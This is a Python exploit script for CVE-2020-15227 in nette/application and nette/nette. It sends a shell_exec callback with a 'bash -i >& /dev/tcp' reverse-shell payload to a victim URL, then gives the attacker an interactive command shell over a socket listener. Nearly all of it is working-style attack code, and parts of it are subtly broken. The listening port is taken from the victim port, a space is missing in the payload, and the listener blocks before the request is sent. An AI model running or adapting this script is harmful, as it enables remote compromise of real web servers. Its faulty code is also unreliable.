#!/usr/bin/python
# author: @fr0z3nsp4z3
#
# Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6
# and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to an
# code injection attack by passing specially formed parameters to URL that may possibly leading to RCE.
#
# Reported by Cyku Hong from DEVCORE (https://devco.re)
#
# Impact
# Code injection, possible remote code execution.
#
# Patches
# Fixed in nette/application 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette 2.0.19 and 2.1.13

import sys
import socket
from urllib import request
import argparse
import pyfiglet

print(pyfiglet.figlet_format('EXPLOITED BY'))
print(pyfiglet.figlet_format('FR0Z3NSP4Z3'))

parser = argparse.ArgumentParser(description='CVE-2020-15227 exploit by fr0z3nsp4z3')
parser.add_argument('url', metavar='url', nargs='+', help='Victim web URL formated as http|s://domain.com')
parser.add_argument('port', metavar='port', nargs='+', help='Victim web service port')
parser.add_argument('lhost', metavar='lhost', nargs='+', help='Attacker box IP|domain')
parser.add_argument('lport', metavar='lport', nargs='+', help='Attacker box port')

sys.argv = parser.parse_args()

url = sys.argv.url[0]
port = sys.argv.port[0]

lhost = sys.argv.lhost[0]
lport = sys.argv.port[0]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # start a socket object 's'

s.bind((lhost, lport))  # define the kali IP and the listening port

s.listen(1)  # define the backlog size, since we are expecting a single connection from a single
# target we will listen to one connection

print('[+] Listening for incoming TCP connection on port 9999')

conn, addr = s.accept()
r = request.urlopen(url+':'+port+'/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1')

print('[+] We got a connection from: ', addr)

while True:
    command = input()  # Get user input and store it in command variable

    if 'exit' in command:  # If we got terminate command, inform the client and close the connect and break the loop
        conn.close()
        break

    else:
        conn.send(bytes(command))  # Otherwise we will send the command to the target
        print(conn.recv(1024))  # and print the result that we got back